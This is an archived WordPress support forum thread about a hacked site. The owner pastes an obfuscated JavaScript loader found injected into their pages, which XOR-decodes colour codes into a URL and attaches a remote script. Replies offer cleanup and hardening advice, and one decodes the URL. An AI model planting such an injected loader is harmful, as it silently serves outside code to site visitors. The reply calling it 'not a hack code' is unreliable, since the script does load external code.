WordPress.org

Ready to get started?Download WordPress

Forums

WordPress vulnerability? (4 posts)

  1. julietchoy
    Member
    Posted 2 years ago #

    I found that a lot of the pages of my wordpress website (alongside with phpbb3 and mediawiki) are being appended with a suspicious Javascript:

    function vdch() {
    	if(document.all.length > 3) {
    		var t = new Array('#6a7072', '#723e29', '#2d6562', '#6d7667', '#606863', '#766b72', '#712a65', '#6d2a73', '#692b6c', '#712b00');
    		var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }
    		var dch = document.createElement("script");
    		dch.id = "dchid";
    		dch.src = dchid;
    		document.all[3].appendChild(dch);
    	} else {
    		setTimeout("vdch()",500);
    	}
    } setTimeout("vdch()",500);
    </script>

    I have searched the web and found that it looks like a wordpress issue:
    http://forums.aria.co.uk/archive/index.php/t-72585.html

    I had tried recover the site by download and re-upload again. However, a few hours later, it was hacked again.

    Do anyone of you know how to prevent this?

    Thanks a lot for your help.

  2. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    Have you spoken to your hosts about this? The hacker could be gaining access anywhere on the server. Especially given that mediaWiki and PHPbb3 were also targeted. In the meantime, you may want to review these resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

  3. MickeyRoush
    Member
    Posted 2 years ago #

    Some infected Joomla sites reported that they had that in their sites as well about a month ago.

  4. grest
    Member
    Posted 2 years ago #

    Hi folks

    This code is easy to know what it does.
    It is not a hack code, simply it generates a URL path from this color codes, and it is paste on the document text as an URL.

    On this case it generates the URL: http://adorabletots.co.uk/js/
    if i were you i won't follow that URL.

    1. To stop be hacked you must change your password FTP (as more dificult as possible to guess)
    2. Your folders must be on 755 and files on 644 (for linux).
    3. Maybe if you have been hacked you must check your file to delete all the strange files, also the code infected have to be replace with the default one.

    see you.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.